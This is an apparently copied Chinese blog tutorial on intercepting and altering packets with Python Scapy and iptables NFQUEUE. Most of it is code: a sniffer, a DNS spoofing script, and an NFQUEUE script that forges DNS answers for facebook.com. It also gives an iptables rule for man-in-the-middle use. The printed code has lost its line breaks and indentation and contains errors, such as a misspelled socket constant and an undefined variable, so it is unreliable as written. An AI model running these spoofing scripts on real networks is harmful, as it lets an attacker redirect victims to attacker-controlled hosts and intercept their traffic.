python使用Scapy + Nfqueue抓包并修改

2024-04-01 05:58

本文主要是介绍python使用Scapy + Nfqueue抓包并修改,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

背景1  Nfqueue

Nfqueue是iptables和ip6tables的target,这个target可以将数据包交给用户空间。比如,下面的一个iptables规则

iptables -A INPUT -j NFQUEUE --queue-num 0


那么在用户空间,可以使用libnetfilter_queue来连接到queue  0(默认)并且从内核获得该消息,然后,必须给出对这个数据包的裁决(Drop,Accept等等)

一般在iptables中的target有以下五种(ACCEPT,DROP,RETURN,QUEUE,other_chain,而NFQUEUE是QUEUE的扩展。相比于QUEUE,它可以由用户指定不同的queue number。

背景2  scapy


之前写过一篇博客Scapy基础学习
监听数据:

from scapy.all import *
def callback(pkt):if pkt.haslayer(TCP):print pkt.summary()print pkt.show()print pkt[TCP] 
sniff(filter=”port 80”, prn=callback, store=0, iface=’wlan0’)

注入数据

pkt=Ether()/IP(dst="new.ycombinator.com")/TCP()/"GET /index.html HTTP/1.0 \n\n"
send(pkt)


一个dns_spoof示例:

from scapy.all import *
def dns_spoof(pkt):redirect_to = '192.168.115.110'if pkt.haslayer(DNSQR): # DNS question recordspoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \an=DNSRR(rrname=pkt[DNS].qd.qname,  ttl=10, rdata=redirect_to))send(spoofed_pkt)print 'Sent:', spoofed_pkt.summary()
sniff(filter='udp port 53', iface='wlan0', store=0, prn=dns_spoof)


Scapy + nfqueue 数据包拦截,修改和转发

1.先看一个简单的例子:
 

import nfqueue
from scapy.all import *
import os
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)payload.set_verdict(nfqueue.ACCEPT)
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_NET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')
main()


2.再看如何修改数据包:

import nfqueue
from scapy.all import *
import os
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)if pkt.haslayer(DNSQR): # Beginning modificationspkt[IP].dst = '192.168.115.118'pkt[IP].len = len(str(pkt))pkt[UDP].len = len(str(pkt[UDP]))del pkt[IP].chksumpayload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_INET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')
main()


注:这里需要关注payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt)),这个是使用iptables和nfqueue来发送数据,也可以不使用set_verdict_modified()函数。在callbak里可以这样操作:


payload.set_verdict(NF_DROP) 
send(modified_packet) 

3.上一个完整的dns-sproof示例

import nfqueue
from scapy.all import *
import os
domain = 'facebook.com'
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)if not pkt.haslayer(DNSQR):payload.set_verdict(nfqueue.NF_ACCEPT)else:if domain in pkt[DNS].qd.qname:spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=localIP))payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))print '[+] Sent spoofed packet for %s' % domain
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_INET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')sys.exit('losing...')
main()

如果是中间人攻击的话,iptables规则需要修改成os.system('iptables -t nat PREROUTING -p udp --dport 53 -j NFQUEUE')才会起作用。


相关资料:

https://blog.csdn.net/wang_walfred/article/details/50475912

http://security.maruhn.com/netfilter-hacking-howto/

http://www.grep.it/RMD/05-Netfilter.pdf

http://security.maruhn.com/iptables-tutorial/x9983.html

http://bbs.chinaunix.net/thread-1939832-1-1.html

http://bbs.chinaunix.net/thread-1960139-1-1.html

http://dac01.sakura.ne.jp/projects/firewall/iptips.html

http://sourcecodebrowser.com/nfqueue-bindings/0.1/nfq__common_8c.html

http://ytliu.info/blog/2013/03/29/netfilterxue-xi-bi-ji-(er-)/

http://stackoverflow.com/questions/27244736/wrong-tcp-checksum-calculation-by-scapy

这篇关于python使用Scapy + Nfqueue抓包并修改的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/866379

相关文章

Python中你不知道的gzip高级用法分享

《Python中你不知道的gzip高级用法分享》在当今大数据时代,数据存储和传输成本已成为每个开发者必须考虑的问题,Python内置的gzip模块提供了一种简单高效的解决方案,下面小编就来和大家详细讲... 目录前言:为什么数据压缩如此重要1. gzip 模块基础介绍2. 基本压缩与解压缩操作2.1 压缩文

Spring IoC 容器的使用详解(最新整理)

《SpringIoC容器的使用详解(最新整理)》文章介绍了Spring框架中的应用分层思想与IoC容器原理,通过分层解耦业务逻辑、数据访问等模块,IoC容器利用@Component注解管理Bean... 目录1. 应用分层2. IoC 的介绍3. IoC 容器的使用3.1. bean 的存储3.2. 方法注

Python设置Cookie永不超时的详细指南

《Python设置Cookie永不超时的详细指南》Cookie是一种存储在用户浏览器中的小型数据片段,用于记录用户的登录状态、偏好设置等信息,下面小编就来和大家详细讲讲Python如何设置Cookie... 目录一、Cookie的作用与重要性二、Cookie过期的原因三、实现Cookie永不超时的方法(一)

Python内置函数之classmethod函数使用详解

《Python内置函数之classmethod函数使用详解》:本文主要介绍Python内置函数之classmethod函数使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地... 目录1. 类方法定义与基本语法2. 类方法 vs 实例方法 vs 静态方法3. 核心特性与用法(1编程客

Python函数作用域示例详解

《Python函数作用域示例详解》本文介绍了Python中的LEGB作用域规则,详细解析了变量查找的四个层级,通过具体代码示例,展示了各层级的变量访问规则和特性,对python函数作用域相关知识感兴趣... 目录一、LEGB 规则二、作用域实例2.1 局部作用域(Local)2.2 闭包作用域(Enclos

Linux中压缩、网络传输与系统监控工具的使用完整指南

《Linux中压缩、网络传输与系统监控工具的使用完整指南》在Linux系统管理中,压缩与传输工具是数据备份和远程协作的桥梁,而系统监控工具则是保障服务器稳定运行的眼睛,下面小编就来和大家详细介绍一下它... 目录引言一、压缩与解压:数据存储与传输的优化核心1. zip/unzip:通用压缩格式的便捷操作2.

Python实现对阿里云OSS对象存储的操作详解

《Python实现对阿里云OSS对象存储的操作详解》这篇文章主要为大家详细介绍了Python实现对阿里云OSS对象存储的操作相关知识,包括连接,上传,下载,列举等功能,感兴趣的小伙伴可以了解下... 目录一、直接使用代码二、详细使用1. 环境准备2. 初始化配置3. bucket配置创建4. 文件上传到os

使用Python实现可恢复式多线程下载器

《使用Python实现可恢复式多线程下载器》在数字时代,大文件下载已成为日常操作,本文将手把手教你用Python打造专业级下载器,实现断点续传,多线程加速,速度限制等功能,感兴趣的小伙伴可以了解下... 目录一、智能续传:从崩溃边缘抢救进度二、多线程加速:榨干网络带宽三、速度控制:做网络的好邻居四、终端交互

Python中注释使用方法举例详解

《Python中注释使用方法举例详解》在Python编程语言中注释是必不可少的一部分,它有助于提高代码的可读性和维护性,:本文主要介绍Python中注释使用方法的相关资料,需要的朋友可以参考下... 目录一、前言二、什么是注释?示例:三、单行注释语法:以 China编程# 开头,后面的内容为注释内容示例:示例:四

Python中win32包的安装及常见用途介绍

《Python中win32包的安装及常见用途介绍》在Windows环境下,PythonWin32模块通常随Python安装包一起安装,:本文主要介绍Python中win32包的安装及常见用途的相关... 目录前言主要组件安装方法常见用途1. 操作Windows注册表2. 操作Windows服务3. 窗口操作